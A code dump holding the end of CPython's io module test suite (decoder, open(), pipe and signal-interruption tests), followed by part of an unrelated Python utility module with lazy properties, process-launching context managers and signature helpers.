self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
util.py
|
from typing import Optional, Callable, Union, Iterable, Any
from inspect import Parameter, signature
from multiprocessing.context import Process
from multiprocessing import Queue
from time import sleep, time
from functools import wraps, partial
from warnings import warn, simplefilter
from contextlib import contextmanager
from glom import Spec # NOTE: Third-party
class lazyprop:
"""
A descriptor implementation of lazyprop (cached property).
Made based on David Beazley's "Python Cookbook" book and enhanced with boltons.cacheutils ideas.
>>> class Test:
... def __init__(self, a):
... self.a = a
... @lazyprop
... def len(self):
... print('generating "len"')
... return len(self.a)
>>> t = Test([0, 1, 2, 3, 4])
>>> t.__dict__
{'a': [0, 1, 2, 3, 4]}
>>> t.len
generating "len"
5
>>> t.__dict__
{'a': [0, 1, 2, 3, 4], 'len': 5}
>>> t.len
5
>>> # But careful when using lazyprop that no one will change the value of a without deleting the property first
>>> t.a = [0, 1, 2] # if we change a...
>>> t.len # ... we still get the old cached value of len
5
>>> del t.len # if we delete the len prop
>>> t.len # ... then len being recomputed again
generating "len"
3
"""
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.__isabstractmethod__ = getattr(func, '__isabstractmethod__', False)
self.func = func
def __get__(self, instance, cls):
if instance is None:
return self
else:
value = instance.__dict__[self.func.__name__] = self.func(instance)
return value
def __repr__(self):
cn = self.__class__.__name__
return '<%s func=%s>' % (cn, self.func)
def if_not_empty(obj, if_empty_val=None):
if obj != Parameter.empty:
return obj
else:
return if_empty_val
none_if_not_empty = partial(if_not_empty, if_not_empty=None)
func_info_spec = Spec(
{
'name': '__name__',
'qualname': '__qualname__',
'module': '__module__',
'return_annotation': (signature, 'return_annotation', none_if_not_empty,),
'params': (signature, 'parameters'),
}
)
def py_obj_info(obj):
return func_info_spec.glom(obj)
def conditional_logger(verbose=False, log_func=print):
if verbose:
return log_func
else:
def clog(*args, **kwargs):
pass # do nothing
return clog
class CreateProcess:
"""A context manager to launch a parallel process and close it on exit.
"""
def __init__(
self,
proc_func: Callable,
process_name=None,
wait_before_entering=2,
verbose=False,
args=(),
**kwargs,
):
"""
Essentially, this context manager will call
```
proc_func(*args, **kwargs)
```
in an independent process.
:param proc_func: A function that will be launched in the process
:param process_name: The name of the process.
:param wait_before_entering: A pause (in seconds) before returning from the enter phase.
(in case the outside should wait before assuming everything is ready)
:param verbose: If True, will print some info on the starting/stoping of the process
:param args: args that will be given as arguments to the proc_func call
:param kwargs: The kwargs that will be given as arguments to the proc_func call
The following should print 'Hello console!' in the console.
>>> with CreateProcess(print, verbose=True, args=('Hello console!',)) as p:
... print("-------> Hello module!") # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
Starting process: print...
... print process started.
-------> Hello module!
... print process terminated
"""
self.proc_func = proc_func
self.process_name = process_name or getattr(proc_func, '__name__', '')
self.wait_before_entering = float(wait_before_entering)
self.verbose = verbose
self.args = args
self.kwargs = kwargs
self.clog = conditional_logger(verbose)
self.process = None
self.exception_info = None
def process_is_running(self):
return self.process is not None and self.process.is_alive()
def __enter__(self):
self.process = Process(
target=self.proc_func,
args=self.args,
kwargs=self.kwargs,
name=self.process_name,
)
self.clog(f'Starting process: {self.process_name}...')
try:
self.process.start()
if self.process_is_running():
self.clog(f'... {self.process_name} process started.')
sleep(self.wait_before_entering)
return self
else:
raise RuntimeError('Process is not running')
except Exception:
raise RuntimeError(
f'Something went wrong when trying to launch process {self.process_name}'
)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.process is not None and self.process.is_alive():
self.clog(f'Terminating process: {self.process_name}...')
self.process.terminate()
self.clog(f'... {self.process_name} process terminated')
if exc_type is not None:
self.exception_info = dict(
exc_type=exc_type, exc_val=exc_val, exc_tb=exc_tb
)
@contextmanager
def run_process(
func: Callable,
func_args=(),
func_kwargs=None,
process_name=None,
is_ready: Union[Callable[[], Any], float, int] = None,
timeout=30,
force_kill=True,
verbose=False,
):
def launch_process():
try:
print('starting process!...')
clog(f'Starting {process_name} process...')
process.start()
clog(f'... {process_name} process started.')
except Exception:
raise RuntimeError(
f'Something went wrong when trying to launch process {process_name}'
)
def launch_and_wait_till_ready(
start_process: Callable[[], Any],
is_ready: Union[Callable[[], Any], float, int] = 5.0,
check_every_seconds=1.0,
timeout=30.0,
):
"""A function that launches a process, checks if it's ready, and exits when it is.
:param start_process: A argument-less function that launches an independent process
:param is_ready: A argument-less function that returns False if, and only if, the process should be considered ready
:param check_every_seconds: Determines the frequency that is_ready will be called
:param timeout: Determines how long to wait for the process to be ready before we should give up
:return: start_process_output, is_ready_output
"""
start_time = time()
# If is_ready is a number, make an is_ready function out of it
if isinstance(is_ready, (float, int)):
is_ready_in_seconds = is_ready
def is_ready_func():
f"""Returns True if, and only if, {is_ready_in_seconds} elapsed"""
return time() - start_time >= is_ready_in_seconds
is_ready_func.__name__ = f'wait_for_seconds({is_ready_in_seconds})'
is_ready = is_ready_func
start_process_output = start_process() # needs launch a parallel process!
while time() - start_time < timeout:
tic = time()
is_ready_output = is_ready()
if is_ready_output is False:
elapsed = time() - tic
sleep(max(0, check_every_seconds - elapsed))
else:
return start_process_output, is_ready_output
# If you got so far, raise TimeoutError
raise TimeoutError(
f"Launching {getattr(start_process, '__qualname__', None)} "
f"and checking for readiness with {getattr(is_ready, '__qualname__', None)} "
f'timedout (timeout={timeout}s)'
)
kwargs = func_kwargs or {}
clog = conditional_logger(verbose)
process_name = process_name or getattr(func, '__qualname__', '\b')
try:
process = Process(target=func, args=func_args, kwargs=kwargs, name=process_name)
if is_ready: # if the 'is_ready' time or predicate is defined
launch_and_wait_till_ready(launch_process, is_ready, timeout=timeout)
else:
launch_process()
yield process
finally:
if process is not None and process.is_alive():
if force_kill:
clog(f'Terminating process: {process_name}...')
process.terminate()
clog(f'... {process_name} process terminated')
else:
process.join()
def deprecate(func=None, *, msg=None):
"""Decorator to emit a DeprecationWarning when the decorated function is called."""
if func is None:
return partial(deprecate, msg=msg)
else:
assert callable(func), f'func should be callable. Was {func}'
msg = msg or f'{func.__qualname__} is being deprecated.'
@wraps(func)
def deprecated_func(*args, **kwargs):
simplefilter('always', DeprecationWarning) # turn off filter
warn(msg, category=DeprecationWarning, stacklevel=2)
simplefilter('default', DeprecationWarning) # reset filter
return func(*args, **kwargs)
return deprecated_func
class Missing:
"""A class to use as a value to indicate that something was missing"""
def __init__(self, val=None):
self.val = val
class Skip:
"""Class to indicate if one should skip an item"""
def obj_to_items_gen(
obj,
attrs: Iterable[str],
on_missing_attr: Union[Callable, Skip, None] = Missing,
kv_trans: Optional[Callable] = lambda k, v: (k, v)
if v is not Parameter.empty
else None,
):
"""Make a generator of (k, v) items extracted from an input object, given an iterable of attributes to extract
:param obj: A python object
:param attrs: The iterable of attributes to extract from obj
:param on_missing_val: What to do if an attribute is missing:
- Skip: Skip the item
- Callable: Call a function with the attribute as an input
- anything else: Just return that as a value
:param kv_trans:
:return: A generator
"""
def gen():
for k in attrs:
v = getattr(obj, k, Missing)
if v is Missing:
if on_missing_attr is obj_to_items_gen.Skip:
continue # skip this
elif callable(on_missing_attr):
yield k, on_missing_attr(k)
else:
yield k, on_missing_attr
yield k, getattr(obj, k, on_missing_attr)
if kv_trans is not None:
assert callable(kv_trans)
assert list(signature(kv_trans).parameters) == [
'k',
'v',
], f'kv_trans must have signature (k, v)'
_gen = gen
def gen():
for k, v in _gen():
x = kv_trans(k=k, v=v)
if x is not None:
yield x
return gen
obj_to_items_gen.Skip = Skip
class _pyparam_kv_trans:
"""A collection of kv_trans functions for pyparam_to_dict"""
@staticmethod
def skip_empties(k, v):
return (k, v) if v is not Parameter.empty else None
@staticmethod
def with_str_kind(k, v):
if v is Parameter.empty:
return None
elif k == 'kind':
return k, str(v)
else:
return k, v
def pyparam_to_dict(param, kv_trans: Callable = _pyparam_kv_trans.skip_empties):
"""Get dict from a Parameter object
:param param: A inspect.Parameter instance
:param kv_trans: A callable that will be called on the (k, v) attribute items of the Parameter instance
:return: A dict extracted from this Parameter
>>> from inspect import Parameter, Signature, signature
>>> from functools import partial
>>>
>>> def mult(x: float, /, y=1, *, z: int=1): ...
>>> params_dicts = map(pyparam_to_dict, signature(mult).parameters.values())
>>> # see that we can recover the original signature from these dicts
>>> assert Signature(map(lambda kw: Parameter(**kw), params_dicts)) == signature(mult)
Now what about the kv_trans? It's default is made to return None when a value is equal to
`Parameter.empty` (which is the way the inspect module distinguishes the `None` object from
"it's just not there".
But we could provide our own kv_trans, which should be a function taking `(k, v)` pair
(those k and v arg names are imposed!) and returns... well, what ever you want to return
really. But you if return None, the `(k, v)` item will be skipped.
Look here how using `kv_trans=pyparam_to_dict.kv_trans.with_str_kind` does the job
of skipping `Parameter.empty` items, but also cast the `kind` value to a string,
so that it can be jsonizable.
>>> params_to_jdict = partial(pyparam_to_dict, kv_trans=pyparam_to_dict.kv_trans.with_str_kind)
>>> got = list(map(params_to_jdict, signature(mult).parameters.values()))
>>> expected = [
... {'name': 'x', 'kind': 'POSITIONAL_ONLY', 'annotation': float},
... {'name': 'y', 'kind': 'POSITIONAL_OR_KEYWORD', 'default': 1},
... {'name': 'z', 'kind': 'KEYWORD_ONLY', 'default': 1, 'annotation': int}]
>>> assert got == expected, f"\\n got={got}\\n expected={expected}"
"""
gen = obj_to_items_gen(
param,
attrs=('name', 'kind', 'default', 'annotation'),
on_missing_attr=None,
kv_trans=kv_trans,
)
return dict(gen())
pyparam_to_dict.kv_trans = _pyparam_kv_trans
class ModuleNotFoundIgnore:
"""Context manager to ignore ModuleNotFoundErrors.
When all goes well, code is executed normally:
>>> with ModuleNotFoundIgnore():
... import os.path # test when the module exists
... # The following code is reached and executed
... print('hi there!')
... print(str(os.path.join)[:14] + '...') # code is reached
hi there!
<function join...
But if you try to import a module that doesn't exist on your system,
the block will be skipped from that point onward, silently.
>>> with ModuleNotFoundIgnore():
... import do.i.exist
... # The following code is NEVER reached or executed
... print(do.i.exist)
... t = 0 / 0
But if there's any other kind of error (other than ModuleNotFoundError that is,
the error will be raised normally.
>>> with ModuleNotFoundIgnore():
... t = 0/0
Traceback (most recent call last):
...
ZeroDivisionError: division by zero"""
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is ModuleNotFoundError:
return True
# else:
# return True
class TypeAsserter:
"""Makes a callable that asserts that a value `v` has the expected type(s) that it's kind `k` should be
>>> assert_type = TypeAsserter({'foo': str, 'bar': (Callable, type(None))})
>>> assert_type('bar', lambda x: x)
>>> assert_type('bar', None)
>>> assert_type('foo', 'i am a string')
>>> assert_type('foo', list('i am not a string'))
Traceback (most recent call last):
...
AssertionError: Invalid foo type, must be a <class 'str'>, but was a <class 'list'>
If a kind wasn't specified, the default is to ignore
>>> assert_type('not_a_kind', 'blah')
>>> assert_type = TypeAsserter({'foo': str, 'bar': (Callable, type(None))}) # nothing happens
But you can choose to warn or raise an exception instead
